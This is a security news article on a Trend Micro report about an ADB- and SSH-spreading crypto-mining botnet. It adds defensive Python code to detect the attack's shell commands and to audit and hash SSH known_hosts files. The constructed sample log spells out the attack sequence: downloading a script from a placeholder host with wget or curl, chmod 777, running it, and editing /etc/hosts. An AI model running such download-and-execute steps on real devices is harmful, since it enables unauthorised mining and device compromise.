A new cryptocurrency mining botnet has been discovered that uses the Android Debug Bridge (ADB) Wi-Fi interface and SSH connections to hosts to infect other devices. The botnet malware has spread to 21 countries with the highest rates of infection observed in South Korea, revealed a report from Trend Micro.
While ADB is disabled on most Android devices by default, some ship with it enabled, allowing unauthenticated attackers to connect remotely over TCP port 5555 and gain direct access via the ADB command shell, which developers commonly use to install and debug apps.
During the first stage of the attack, the IP address 45[.]67[.]14[.]179 connects to a device running ADB and uses the ADB command shell to change the attacked system’s working directory to “/data/local/tmp”. This directory is chosen because .tmp files typically have default execution permissions.
The bot then performs a series of checks to determine whether it has landed on a honeypot and which operating system the targeted device is running. Next, the implant uses wget to download the payload, falling back to curl if wget is not present on the infected system. It then runs “chmod 777 a.sh” to change the permissions of the downloaded payload and executes a series of commands to remove its traces.
Once downloaded, the payload lets the botnet choose one of three miners depending on the infected system’s manufacturer, architecture, processor type, and hardware. All three miners are delivered from the same URL.
“To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as ‘/sbin/sysctl -w vm.nr_hugepages=128’,” note the researchers.
Additionally, the bot targets rival cryptocurrency miners if they are found on the victim’s device. It blocks a competitor by modifying /etc/hosts and adding the record “0.0.0.0 miningv2.duckdns.org”, which sinkholes the URL of the competing miner.
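The behaviours described above (changing into /data/local/tmp, fetching a script with wget or curl, chmod 777 on it, the HugePages sysctl and the /etc/hosts sinkhole record) are each individually mundane, but together they make a usable detection signature for shell or process-audit logs. The following is an added example written for this article, not code from the Trend Micro report: the regexes, the sample command log and the sample hosts file are constructed here, and the three-indicator threshold is an assumption to tune against your own telemetry.

```python
import re

# Indicators drawn from the behaviour described in the article. The regexes,
# the sample command log and the sample hosts file are constructed for this
# example and are not taken from the report.
INDICATORS = {
    "adb_tmp_workdir": re.compile(r"\bcd\s+/data/local/tmp\b"),
    "payload_download": re.compile(r"\b(wget|curl)\b.*https?://"),
    "chmod_777_script": re.compile(r"\bchmod\s+777\s+\S+\.sh\b"),
    "hugepages_tuning": re.compile(r"sysctl\s+-w\s+vm\.nr_hugepages=\d+"),
    "hosts_sinkhole": re.compile(r"0\.0\.0\.0\s+\S+.*>>?\s*/etc/hosts"),
}


def scan_command_log(lines):
    """Return (line_number, indicator_name) pairs for every matching line."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((n, name))
    return hits


def distinct_indicators(lines):
    """Sorted names of the distinct indicators seen in the log."""
    return sorted({name for _, name in scan_command_log(lines)})


def looks_like_adb_miner(lines, threshold=3):
    """Flag a session when several independent indicators occur together.

    A single hit (a developer cd'ing into /data/local/tmp) is normal; the
    threshold is an assumed starting point, not a value from the report.
    """
    return len(distinct_indicators(lines)) >= threshold


def sinkholed_hosts(hosts_text):
    """List hostnames that an /etc/hosts body maps to 0.0.0.0 (comments ignored)."""
    names = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "0.0.0.0":
            names.extend(parts[1:])
    return names


# Constructed sample of a shell session that mirrors the described sequence.
# The download URL is a placeholder (.invalid TLD), not the real one.
SAMPLE_LOG = [
    "cd /data/local/tmp",
    "wget http://example.invalid/a.sh || curl -O http://example.invalid/a.sh",
    "chmod 777 a.sh",
    "./a.sh",
    "/sbin/sysctl -w vm.nr_hugepages=128",
    'echo "0.0.0.0 miningv2.duckdns.org" >> /etc/hosts',
    "rm -f a.sh",
]

# Constructed /etc/hosts body after the bot has added its sinkhole record.
SAMPLE_HOSTS = """127.0.0.1 localhost
::1 localhost
0.0.0.0 miningv2.duckdns.org  # constructed sample entry
"""

if __name__ == "__main__":
    for n, name in scan_command_log(SAMPLE_LOG):
        print(f"line {n}: {name}")
    print("verdict:", looks_like_adb_miner(SAMPLE_LOG))
    print("sinkholed:", sinkholed_hosts(SAMPLE_HOSTS))
```

In practice `scan_command_log` would be fed from whatever records shell activity on the device (for Android, `logcat` output from the ADB daemon or a process-audit feed), and `sinkholed_hosts` run periodically over `/etc/hosts` so that a new 0.0.0.0 record for a non-local name is raised as an alert rather than discovered by accident.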
One of the interesting aspects of this botnet is the use of a spreading mechanism via SSH which enables it to infect systems listed in the known_hosts file of compromised devices.
“Being a known device means the system can communicate with the other system without any further authentication after the initial key exchange, i.e., each system considers the other as safe. The combination of known hosts and the victim’s public key makes it possible for the malware to connect to smart devices or systems that have previously connected to the infected system,” explains Trend Micro.
Once connected via SSH to another target, the malware uses two spreader scripts to download, install, and launch a miner payload.
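The SSH spreading step works because a plaintext known_hosts file is a ready-made list of systems the compromised device has previously talked to. OpenSSH can store those entries hashed instead (`HashKnownHosts yes` in ssh_config, or `ssh-keygen -H` to convert an existing file), so that a reader of the file learns nothing about which hosts it names. The following is an added example, not code from the report or from OpenSSH: it parses a known_hosts body, reports which host names are readable in clear, and reproduces the OpenSSH hashed-host format (`|1|base64(salt)|base64(HMAC-SHA1(salt, host))`) so an operator can verify that a hashed entry corresponds to a given host. The sample file, placeholder keys and fixed salt are constructed here.

```python
import base64
import hashlib
import hmac


def parse_known_hosts(text):
    """Parse known_hosts lines into dicts; hashed entries expose no host names."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        marker = None
        if fields[0].startswith("@"):          # e.g. @cert-authority, @revoked
            marker, fields = fields[0], fields[1:]
        if len(fields) < 3:
            continue
        hostpart, keytype = fields[0], fields[1]
        hashed = hostpart.startswith("|1|")
        entries.append({
            "marker": marker,
            "hashed": hashed,
            "hosts": [] if hashed else hostpart.split(","),  # may be "host,addr"
            "hostpart": hostpart,
            "keytype": keytype,
        })
    return entries


def plaintext_hosts(text):
    """Host names and addresses that anyone reading the file can see directly."""
    names = []
    for entry in parse_known_hosts(text):
        names.extend(entry["hosts"])
    return names


def audit_known_hosts(text):
    """Summary counts; a non-zero 'plaintext' count is what to act on."""
    entries = parse_known_hosts(text)
    hashed = sum(1 for e in entries if e["hashed"])
    return {"entries": len(entries), "hashed": hashed, "plaintext": len(entries) - hashed}


def hash_host(hostname, salt):
    """Build the OpenSSH hashed host field |1|b64(salt)|b64(HMAC-SHA1(salt, host))."""
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def hashed_entry_matches(hostpart, hostname):
    """True if a hashed known_hosts host field was produced for `hostname`."""
    _, _, salt_b64, digest_b64 = hostpart.split("|")
    salt = base64.b64decode(salt_b64)
    expected = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(digest_b64))


# Constructed sample: two plaintext entries and one hashed entry. The key
# blobs are placeholders, not real public keys; the salt is fixed so the
# sample is reproducible (OpenSSH uses a random 20-byte salt per entry).
_SALT = bytes(range(20))
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample; keys are placeholders",
    "10.0.0.5,build-box ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER0001",
    "[10.0.0.7]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPLACEHOLDER0002",
    hash_host("10.0.0.9", _SALT) + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER0003",
])

if __name__ == "__main__":
    print("readable in clear:", plaintext_hosts(SAMPLE_KNOWN_HOSTS))
    print("summary:", audit_known_hosts(SAMPLE_KNOWN_HOSTS))
    entry = parse_known_hosts(SAMPLE_KNOWN_HOSTS)[2]["hostpart"]
    print("hashed entry is 10.0.0.9:", hashed_entry_matches(entry, "10.0.0.9"))
```

Hashing only removes the host list; it does not change the other half of what the report describes, the private key on the compromised device that authenticates to those hosts. Keeping that key passphrase-protected and loaded only in an agent for the duration of a session, rather than unencrypted on disk, is the complementary control.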